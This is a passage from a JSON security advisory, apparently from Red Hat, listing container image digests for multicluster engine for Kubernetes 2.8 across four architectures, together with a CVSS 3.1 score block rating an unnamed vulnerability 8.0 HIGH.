"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
